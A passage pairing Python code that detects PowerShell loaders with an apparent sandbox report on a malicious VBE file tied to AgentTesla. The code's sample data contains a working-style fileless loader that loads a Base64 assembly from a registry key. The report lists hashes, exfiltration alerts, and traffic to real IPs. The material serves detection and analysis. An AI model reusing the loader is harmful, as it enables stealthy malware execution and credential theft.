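LOADER_TEXT = ("[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join "
               "(Get-ItemProperty -LiteralPath 'HKCU:\\Software\\dirDChDJoZeRjid' -Name 's').s "
               "| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('dirDChDJoZeRjid')\r\n"
               "Stop-Process -Name conhost -Force")

# Constructed events in the shape of Sysmon 1 / Security 4688 (process_create)
# and PowerShell 4104 (script_block). Only pid 200, started by the script host
# with an argument-less command line, is malicious here.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 50, "ppid": 1,
     "image": "C:\\Windows\\explorer.exe", "command_line": "explorer.exe"},
    {"type": "process_create", "pid": 100, "ppid": 50,
     "image": "C:\\Windows\\System32\\wscript.exe",
     "command_line": 'wscript.exe "C:\\Users\\user\\Desktop\\Ref#150689.vbe"'},
    {"type": "process_create", "pid": 200, "ppid": 100,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"type": "script_block", "pid": 200, "text": LOADER_TEXT},
    {"type": "process_create", "pid": 300, "ppid": 50,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
    {"type": "script_block", "pid": 300, "text": "Get-Date"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid: int, procs: dict) -> list:
    """Walk ppid links upwards; stops at unknown parents and guards against
    loops caused by pid reuse."""
    chain, seen = [], {pid}
    cur = procs.get(pid)
    while cur is not None and cur["ppid"] in procs and cur["ppid"] not in seen:
        cur = procs[cur["ppid"]]
        seen.add(cur["pid"])
        chain.append(cur)
    return chain


def detect(events: list) -> list:
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    blocks = defaultdict(list)
    for e in events:
        if e["type"] == "script_block":
            blocks[e["pid"]].append(e["text"])
    findings = []
    for pid, proc in procs.items():
        if basename(proc["image"]) != "powershell.exe":
            continue
        reasons = []
        chain = [basename(a["image"]) for a in ancestors(pid, procs)]
        if SCRIPT_HOSTS & set(chain):
            reasons.append("powershell.exe descends from a script host: " + " <- ".join(chain))
        # Command line AND script-block text: a loader typed into an interactive
        # session leaves the command line empty, as in this sample.
        text = "\n".join([proc["command_line"]] + blocks[pid])
        hits = [name for name, rx in LOADER_MARKERS.items() if rx.search(text)]
        if {"assembly_load", "base64"} <= set(hits):
            reasons.append("in-memory assembly load from encoded data (" + ", ".join(hits) + ")")
        if reasons:
            findings.append({"pid": pid, "reasons": reasons, "markers": hits})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The parent-chain check fires on its own even when no 4104 events are available, which is the state of most estates without script block logging enabled; the marker check is what turns "script host launched PowerShell" into "PowerShell loaded an assembly staged in the user's registry hive".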
                                                                File type:data
                                                                Entropy (8bit):3.939201181970454
                                                                TrID:
                                                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                • MP3 audio (1001/1) 32.22%
                                                                • Lumena CEL bitmap (63/63) 2.03%
                                                                • Corel Photo Paint (41/41) 1.32%
                                                                File name:Ref#150689.vbe
                                                                File size:12'114 bytes
                                                                MD5:3ee57f19875a1b263377d8ab4af8f677
                                                                SHA1:619eec8b7c7a819a87959fd9026dc58dfe965e68
                                                                SHA256:3fa9114a2d3fddc77550a3567cac63db1bf0c72bebe23d9ceed62cf47ea68c34
                                                                SHA512:b53be96cec95ea0281a796e8c01f034c0739d9391bda447e67cc469d49643f2d8b0926c51a69b6a918beb4f51290501a621256fa2987437b67ad9249bbb89d13
                                                                SSDEEP:192:5JNhDRAnShs0fn5nwVFUKq2oJkNMG2BXtqzXlcFqF6SAzzAnJA0Y/7qOsK:nNs0fn5nwck4C098J2/7qOt
                                                                TLSH:12428844CE8D42C1E3216B976FCA9AD5172F9A21BF0F0BD52C6443D5232ADC1E566F32
                                                                File Content Preview:..#.@.~.^.j.x.c.A.A.A.=.=.v.9.k...G.Z.4.f.9.K.}...].L.b.N.@.#.@.&.}.w.O.r.K.x.P.A.a.w.^.k.m.b.O.@.#.@.&.@.#.@.&.E.P.M.e.M.~.;.W.U.\...../.b.....x.~.[...P.t.n.a.m.N.n.m.b.h.m.V.~.m.P.D.+.6.D.W.,.M.e.C.@.#.@.&.s.!.x.^.O.b.W.x.,./.W...\.+.M.O.r.D._.+.X.b.P.+
                                                                Icon Hash:68d69b8f86ab9a86
                                                                Timestamp                        SID      Signature                                                           Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
                                                                2024-10-22T14:45:59.281919+0200  2030171  ET MALWARE AgentTesla Exfil Via SMTP                                1         192.168.2.5  49764        162.254.34.31  587        TCP
                                                                2024-10-22T14:45:59.281919+0200  2840032  ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2  1         192.168.2.5  49764        162.254.34.31  587        TCP
                                                                2024-10-22T14:46:31.537759+0200  2855245  ETPRO MALWARE Agent Tesla Exfil via SMTP                            1         192.168.2.5  49764        162.254.34.31  587        TCP
                                                                2024-10-22T14:46:31.537759+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity                        1         192.168.2.5  49764        162.254.34.31  587        TCP
                                                                Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                                Oct 22, 2024 14:46:03.726713896 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:03.732211113 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:03.732393026 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:03.732659101 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:03.737960100 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.588548899 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.588563919 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.588589907 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.588601112 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.588610888 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.588620901 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.588850975 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.589106083 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.589116096 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.589122057 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.589168072 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.589391947 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.589493036 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.594352007 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.594404936 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.594417095 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.594538927 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.594558001 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.594609976 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.719301939 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719367027 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719378948 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719438076 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.719600916 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719649076 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.719676971 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719779968 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719825983 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.719856024 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719927073 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.719964981 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.720086098 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.720097065 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.720107079 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.720134020 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.720627069 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.720679045 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.720685005 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:04.765830994 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:04.771303892 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021224976 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021281958 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021318913 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021353006 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021354914 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.021394014 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.021533966 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021564007 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021606922 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.021636963 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021791935 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021825075 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.021833897 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.021996975 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.022047043 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.022438049 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.022571087 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.022604942 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.022615910 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.022818089 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.022871017 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.023242950 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.023392916 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.023428917 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.023437977 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.023576021 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.023626089 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.024044037 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.024096966 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.024130106 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.024138927 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.024333954 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.024384022 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.024842024 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.024893999 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.024928093 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.024935961 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.078775883 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.138569117 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.138662100 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.138700008 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.138729095 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.138745070 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.138781071 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.138796091 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.139024019 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.139060020 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.139076948 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.139276028 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.139333010 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.139311075 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.188122034 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.246551037 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.252235889 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.502326012 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.502393007 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.502405882 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.502573013 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.502572060 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.502584934 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.502623081 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.502794981 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.502859116 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.502909899 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503086090 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503098011 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503108025 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503133059 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.503144979 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.503365993 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503490925 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503503084 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503534079 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.503705978 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503726959 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503745079 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.503941059 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.503988981 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.504082918 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504095078 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504126072 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.504327059 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504338980 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504384995 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.504654884 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504722118 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504734039 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504760981 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.504975080 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504986048 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.504996061 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.505019903 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.505042076 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.622957945 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.622994900 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623007059 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623140097 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.623162031 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623303890 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623326063 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623332024 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.623337984 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623366117 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.623774052 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623786926 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623796940 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623809099 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.623828888 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.623866081 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.624177933 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.624191046 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.624202013 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.624228001 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.624247074 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.624572039 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.624583960 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.624593973 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.624605894 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.624619961 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.624648094 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.625040054 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625051975 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625062943 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625092030 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.625435114 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625447035 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625458956 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625472069 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625487089 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.625514984 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.625895977 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625910997 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625924110 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.625945091 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.625967026 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.626230955 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.626384020 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.626395941 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.626441002 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.626693010 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.626704931 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.626714945 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.626728058 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.626740932 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.626768112 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.627118111 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.627163887 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.627258062 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.627271891 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.627321959 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.627463102 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.632795095 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.632819891 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.632831097 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.632853985 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.632878065 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.632956028 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.632973909 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633023024 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.633068085 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633230925 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633241892 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633285999 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.633305073 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633349895 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.633392096 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633419037 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633462906 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.633514881 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633533955 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633547068 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.633575916 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.688257933 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.736804962 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.736879110 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.736911058 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.736932039 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.736968040 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737004042 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737019062 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.737242937 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737293959 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737294912 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.737329960 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737365961 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737420082 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.737696886 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737728119 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737756968 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.737903118 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737938881 CEST  80           49705      144.91.79.54  192.168.2.5
                                                                Oct 22, 2024 14:46:05.737970114 CEST  49705        80         192.168.2.5   144.91.79.54
                                                                Oct 22, 2024 14:46:05.738118887 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738169909 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738172054 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.738220930 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738256931 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738272905 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.738291979 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738346100 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.738775969 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738810062 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738846064 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.738859892 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.739332914 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739367962 CEST8049705144.91.79.54192.168.2.5
